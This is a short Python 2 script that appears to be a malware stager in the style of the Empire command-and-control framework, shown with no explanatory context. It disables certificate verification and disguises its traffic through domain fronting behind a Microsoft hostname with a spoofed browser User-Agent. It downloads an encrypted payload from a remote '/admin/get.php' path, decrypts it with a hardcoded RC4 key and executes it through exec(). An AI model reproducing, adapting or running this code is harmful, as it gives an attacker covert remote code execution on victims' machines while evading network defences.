import sys;import ssl;
if hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;
import urllib2;
UA='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931';server='https://ajax.microsoft.com:443';t='/admin/get.php';req=urllib2.Request(server+t);
req.add_header('User-Agent',UA);
req.add_header("Host"," content-tracker.azureedge.net");
req.add_header('Cookie',"fBYebJz=0Yeq24Vz0DysNwWZqyDeNsFxUHc=;");
proxy = urllib2.ProxyHandler();
o = urllib2.build_opener(proxy);
urllib2.install_opener(o);
a=urllib2.urlopen(req).read();
IV=a[0:4];data=a[4:];key=IV+'r9JpQs<CM[,Yh5kRUBj|_v#nEi=f(8!V';S,j,out=range(256),0,[]
for i in range(256):
    j=(j+S[i]+ord(key[i%len(key)]))%256
    S[i],S[j]=S[j],S[i]
i=j=0
for char in data:
    i=(i+1)%256
    j=(j+S[i])%256
    S[i],S[j]=S[j],S[i]
    out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
exec(''.join(out))
